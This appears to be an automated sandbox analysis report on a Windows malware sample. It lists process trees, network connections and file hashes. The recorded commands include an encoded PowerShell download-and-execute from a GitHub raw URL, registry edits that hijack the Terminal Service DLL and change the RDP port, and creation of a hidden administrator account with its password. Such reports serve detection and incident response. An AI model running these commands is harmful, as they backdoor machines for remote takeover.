Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2652 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2652 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 1076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3584 wrote to memory of 1076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1076 wrote to memory of 1412 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1076 wrote to memory of 1412 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3584 wrote to memory of 804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 1180 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 1180 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 2568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 2568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 1636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3584 wrote to memory of 1636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3584 wrote to memory of 1504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3584 wrote to memory of 1504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3584 wrote to memory of 1816 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3584 wrote to memory of 1816 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3584 wrote to memory of 1180 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 3584 wrote to memory of 1180 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1180 wrote to memory of 1848 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1180 wrote to memory of 1848 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3584 wrote to memory of 2784 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3584 wrote to memory of 2784 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2784 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2784 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 4088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1192 wrote to memory of 4088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4088 wrote to memory of 3104 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4088 wrote to memory of 3104 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3584 wrote to memory of 2800 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3584 wrote to memory of 2800 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 1096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 1096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1096 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1096 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2604 wrote to memory of 984 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2604 wrote to memory of 984 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 896 wrote to memory of 1880 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 896 wrote to memory of 1880 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1880 wrote to memory of 1740 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1880 wrote to memory of 1740 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3244 wrote to memory of 3848 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3244 wrote to memory of 3848 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3848 wrote to memory of 352 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3848 wrote to memory of 352 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1272 wrote to memory of 852 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1272 wrote to memory of 852 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 852 wrote to memory of 1816 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 852 wrote to memory of 1816 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3980 wrote to memory of 1308 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3980 wrote to memory of 1308 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1432 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1432 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3704 wrote to memory of 3332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3704 wrote to memory of 3332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3332 wrote to memory of 3752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3332 wrote to memory of 3752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2256 wrote to memory of 1756 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2256 wrote to memory of 1756 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1756 wrote to memory of 1736 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1756 wrote to memory of 1736 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2352 wrote to memory of 1568 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2352 wrote to memory of 1568 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe

"C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lgm3nitg\lgm3nitg.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA08B.tmp" "c:\Users\Admin\AppData\Local\Temp\lgm3nitg\CSC9212ECC7539C4C0BA0BEA2E086131CD.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc w6OkGKLL /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc w6OkGKLL /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc w6OkGKLL /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc w6OkGKLL

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc w6OkGKLL

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc w6OkGKLL

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 www.speedtest.net udp
US 151.101.2.219:80 www.speedtest.net tcp
US 151.101.2.219:443 www.speedtest.net tcp
US 151.101.2.219:80 www.speedtest.net tcp
US 8.8.8.8:53 c.speedtest.net udp
US 151.101.2.219:443 c.speedtest.net tcp
US 8.8.8.8:53 speednld.phoenixnap.com udp
NL 185.56.137.2:8080 speednld.phoenixnap.com tcp
US 8.8.8.8:53 speedtest2.usenet.farm udp
NL 178.20.174.136:8080 speedtest2.usenet.farm tcp
US 8.8.8.8:53 speedtest.xsnews.nl udp
NL 91.223.220.109:8080 speedtest.xsnews.nl tcp
US 8.8.8.8:53 speedtest.hyperfilter.com udp
NL 185.30.167.247:8080 speedtest.hyperfilter.com tcp
US 8.8.8.8:53 zuvujvhuaif.xyz udp
MD 185.163.45.186:443 zuvujvhuaif.xyz tcp

Files

memory/2652-115-0x00000171FED90000-0x00000171FF18F000-memory.dmp

memory/2652-118-0x00000171FE973000-0x00000171FE975000-memory.dmp

memory/2652-117-0x00000171FE970000-0x00000171FE972000-memory.dmp

memory/2652-119-0x00000171FE975000-0x00000171FE976000-memory.dmp

memory/2652-120-0x00000171FE976000-0x00000171FE977000-memory.dmp

memory/3584-121-0x0000000000000000-mapping.dmp

memory/3584-126-0x00000260257D0000-0x00000260257D1000-memory.dmp

memory/3584-129-0x000002603DB00000-0x000002603DB01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

memory/1076-135-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\lgm3nitg\lgm3nitg.cmdline

MD5 6724c7d45d268192f7909bfd5cba7678
SHA1 c262d47aba13cdd1445fbbab33f31a8cee9f9d4a
SHA256 27ccc2d43665f61d8b041e2bf026a5df42da0273b3ef031b496188f83e012eff
SHA512 1986846c600ff2b8bd5fde32d997edd07dc17581b202e7d130220969d4ff9b0755758a7912c2fd268df08a64d6321decfaa68f047e6413ae148dfbb97bd7a6e6

\??\c:\Users\Admin\AppData\Local\Temp\lgm3nitg\lgm3nitg.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

memory/3584-139-0x00000260256F3000-0x00000260256F5000-memory.dmp

memory/3584-138-0x00000260256F0000-0x00000260256F2000-memory.dmp

memory/3584-140-0x00000260256F6000-0x00000260256F8000-memory.dmp

memory/1412-141-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\lgm3nitg\CSC9212ECC7539C4C0BA0BEA2E086131CD.TMP

MD5 59016e2dd4463ec4b4403558df109527
SHA1 199b052d69e7ba6b037c88db9020b689c89d5aa5
SHA256 457cbe18863e13a4b79644b165d91f3d612901e8accdb9f7c5fef83b2b131e9c
SHA512 7d4edd20eee5af9ecb6b7317765c7f95b954342d52c302e668539d943ce32fff21c82296b3e20822ae4bca4c41ca54014c2fc554dc3cb2bda2f83d6d6337c70b

C:\Users\Admin\AppData\Local\Temp\RESA08B.tmp

MD5 2bb5d4a9cb67f1d69e19a04c610e1aa3
SHA1 c4802dae620cc54c12fa9ada50d87f633505ec98
SHA256 2f27d71182119556497413082a9ea1f44a0119277d8e8a07064fc8661387dbb9
SHA512 5a6b75256a5a953a7d3defaaafe8637799a31c1b9bb1de9b9b249e0033f1187d5590076d9dae48c9d22f09a5e4306d824106d76cfd63eeeaac0a2f88a7ae2848

C:\Users\Admin\AppData\Local\Temp\lgm3nitg\lgm3nitg.dll

MD5 aa6426e73cfa9957b2a002c3866be48a
SHA1 db252d123fa4583da323c8d8db84213d75964a4e
SHA256 37ad29fb4dd4b095ef78de2bcd9b4159ba51e7eed0e09ef35214b1c322020cfa
SHA512 bca9653887009f6df2d5a62349e6a4bb12e6b9a395ae2897c4346130c91af7cbcf193df04d76603b12ef9003e56ef3885bc0f22c310ed3e0f2e03fb55a551d88

memory/3584-145-0x000002603DA90000-0x000002603DA91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 9fca6b1768eba2c5d42f189123152e32
SHA1 560ec3249af6e8d82e994554475b870d32145352
SHA256 c5c7012656bfebd5ba7d4ae8459bd2fcc57ac661e413e2b1da339b9fba86de1f
SHA512 b72f2bc28dcde144596eabb62375479c4ddb3b004ac8759ee9523170289f55572784e695a552fd612a5dc5a56f6c76b3baee9831c7cac7123f72b2eb2aadb3f2

memory/3584-152-0x000002603E2C0000-0x000002603E2C1000-memory.dmp

memory/3584-153-0x000002603E650000-0x000002603E651000-memory.dmp

memory/3584-160-0x00000260256F8000-0x00000260256F9000-memory.dmp

memory/804-161-0x0000000000000000-mapping.dmp

memory/804-170-0x0000020E44AF0000-0x0000020E44AF2000-memory.dmp

memory/804-171-0x0000020E44AF3000-0x0000020E44AF5000-memory.dmp

memory/804-174-0x0000020E44AF6000-0x0000020E44AF8000-memory.dmp

memory/1180-200-0x0000000000000000-mapping.dmp

memory/1180-213-0x000001EB77230000-0x000001EB77232000-memory.dmp

memory/804-212-0x0000020E44AF8000-0x0000020E44AFA000-memory.dmp

memory/1180-214-0x000001EB77233000-0x000001EB77235000-memory.dmp

memory/2568-241-0x0000000000000000-mapping.dmp

memory/1180-253-0x000001EB77238000-0x000001EB7723A000-memory.dmp

memory/1180-252-0x000001EB77236000-0x000001EB77238000-memory.dmp

memory/2568-254-0x0000024ACA5E0000-0x0000024ACA5E2000-memory.dmp

memory/2568-255-0x0000024ACA5E3000-0x0000024ACA5E5000-memory.dmp

memory/2568-288-0x0000024ACA5E6000-0x0000024ACA5E8000-memory.dmp

memory/2568-289-0x0000024ACA5E8000-0x0000024ACA5EA000-memory.dmp

memory/1636-299-0x0000000000000000-mapping.dmp

memory/1504-300-0x0000000000000000-mapping.dmp

memory/1816-301-0x0000000000000000-mapping.dmp

memory/1180-338-0x0000000000000000-mapping.dmp

memory/1848-339-0x0000000000000000-mapping.dmp

memory/2784-342-0x0000000000000000-mapping.dmp

memory/1192-343-0x0000000000000000-mapping.dmp

memory/4088-344-0x0000000000000000-mapping.dmp

memory/3104-345-0x0000000000000000-mapping.dmp

memory/2800-346-0x0000000000000000-mapping.dmp

memory/1096-347-0x0000000000000000-mapping.dmp

memory/2604-348-0x0000000000000000-mapping.dmp

memory/984-349-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 0750828e5a80dae0280c43945332e145
SHA1 fa1c85c33c0b99f8df14b6ccbd37f5df3d62c30c
SHA256 637dd8f4245397e281bf84433f75eeb40461e70e81a11a4c2c252dc8f9e4b947
SHA512 a45f4023f5d8951fef44bbe830c1b8992e7cb9c013882048d7227bac0c76869584c1ccc1d323803ced7a1e353998d0bface12eb9ef1dcd04e8e39b155528fd14

\Windows\Branding\mediasvc.png

MD5 0941efccfdbde6a619081456be071102
SHA1 4d9079f335bfdb4e88e022ffdd2193c4561f099d
SHA256 99dbace98f5f29a5c0c962db270dc195a8b6d2f8dbb009b79b929ff9d68d8281
SHA512 bbb587471dec6beae7852ae2ee1fff0efb26ce57ab69dbaf4385c965bf09a31be60c67951e52f488866daa0effab715e6b1a0aca5b02a7fdcc5dd586d84d56ab

memory/1880-352-0x0000000000000000-mapping.dmp

memory/1740-353-0x0000000000000000-mapping.dmp

memory/3848-354-0x0000000000000000-mapping.dmp

memory/352-355-0x0000000000000000-mapping.dmp

memory/852-356-0x0000000000000000-mapping.dmp

memory/1816-357-0x0000000000000000-mapping.dmp

memory/1432-359-0x0000000000000000-mapping.dmp

memory/1308-358-0x0000000000000000-mapping.dmp

memory/3332-360-0x0000000000000000-mapping.dmp

memory/3752-361-0x0000000000000000-mapping.dmp

memory/1756-362-0x0000000000000000-mapping.dmp

memory/1736-363-0x0000000000000000-mapping.dmp

memory/1568-364-0x0000000000000000-mapping.dmp

memory/3960-365-0x0000000000000000-mapping.dmp

memory/2260-366-0x0000000000000000-mapping.dmp

memory/1308-367-0x0000000000000000-mapping.dmp

memory/1308-380-0x000002177AD60000-0x000002177AD62000-memory.dmp

memory/1308-381-0x000002177AD63000-0x000002177AD65000-memory.dmp

memory/1308-382-0x000002177AD66000-0x000002177AD68000-memory.dmp

memory/1308-420-0x000002177AD68000-0x000002177AD69000-memory.dmp

memory/1728-452-0x0000000000000000-mapping.dmp

memory/3848-453-0x0000000000000000-mapping.dmp